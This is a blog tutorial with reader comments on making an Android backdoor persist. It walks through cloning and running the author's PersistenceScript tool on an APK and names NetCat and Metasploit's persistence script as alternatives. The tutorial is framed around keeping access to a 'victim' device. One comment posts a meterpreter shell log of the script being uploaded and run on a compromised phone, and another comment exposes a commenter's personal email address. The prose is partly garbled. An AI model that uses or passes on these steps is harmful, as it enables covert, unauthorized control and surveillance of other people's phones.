Create Persistent Backdoor Android (Easy-to-use Tool)

I hope you enjoy reading this!
Don’t forget to share this blog with your friends.

Table of Contents
Create Persistent Backdoor Android

Guess what’s the most difficult part of hacking, you may think it’s gaining access, but no even maintaining the access is more difficult than that. This is where persistent backdoor comes into play. In this tutorial, you will know how to Create Persistent Backdoor Android.

Here in the article, I break down how you can create a persistent backdoor.

Note: There is a lot to learn in Persistent Backdoors. This article is only about creating the persistent backdoor.

What is a Persistent Backdoor?

Persistent Backdoor
Persistent Backdoor

A persistent Backdoor is the Backdoor that persistence the connection. Backdoor is accessible or persistence remains until a reboot of the system. In that case, to prevent this bavarian you have to use Persistent Backdoor.

For example: If your victim is in the same network i.e. LAN, then the persistence will remain forever on LAN (if you have static IP) same with WAN.

Why Persistent Backdoor is important?

Persistent backdoors help us access a system we have successfully compromised in the past. It is important to note that they may be out of scope during a penetration test; however, being familiar with them is of paramount importance. Let us look at a few persistent backdoors now!

How to Create Persistent Backdoor Android?

For this tutorial, we use PersistenceScript because it’s developed by me so I can explain it more clearly.

Follow this step-by-step guide to make your APK Persistent.

  1. Download the PersistenceScript from Github. (by emulating below commend)
git clone https://github.com/rohitnishad613/PersistenceScript
Download the PersistenceScript from Github
Download the PersistenceScript from Github
  1. Navigate to the directory. (by emulating below commend)
cd PersistenceScript/
Navigate to the directory
Navigate to the directory
  1. Run the PersistenceScript. (by emulating below commend)
python3 PersistenceScript.py

Error: If you saw “tkinter” missing error, install it by executing: “pip install tkinter”.

Run the PersistenceScript
Run the PersistenceScript
  1. Start GUI version.  (by emulating below commend)
python3 PersistenceScript.py --GUI
Run the PersistenceScript in GUI version
Run the PersistenceScript in GUI version
  1. Choose the APK file.
Choose the APK file in PersistenceScript
Choose the APK file in PersistenceScript
  1. Click on the “Generate Script” button.
Generate PersistenceScript
Generate PersistenceScript

Other Persistent Backdoor tools.

  • NetCat
  • Metasploit “persistence” script
  • PersistenceScript  (Tool used in this tutorial)

Sorry, I don’t find any other tool.

Please let me is there any tool that may fit this list.

3 thoughts on “Create Persistent Backdoor Android (Easy-to-use Tool)”

  1. Avatar of jan

    I managed to run your script, had to use apktool instead of “./Tools/apktool.jar”
    When I run the app I get a session.
    I do:
    cd /
    cd sdcard
    upload PersistanceScript.sh
    shell
    sh PersistanceScript.sh
    CRTL +C

    However, after i close the app my session dies.

    meterpreter > shell
    Process 1 created.
    Channel 2 created.
    sh ./PersistenceScript.sh
    Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=by.dustteam.hangman/.vkcbc.Zxdrv }
    Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] c….

    1. Avatar of Next

      Hello, i0m in a very similar situation right here, i would love to know if you figure out how to make it persistent, i’ll leave you my email for you to contact me and maybe we can share some of our knowledge about it 🙂 email is nexito_31@hotmail.com

Leave a Comment

Your email address will not be published. Required fields are marked *

Get an AMAZING ARTICLE for FREE that cost me 100$
Get an AMAZING ARTICLE for FREE that cost me 100$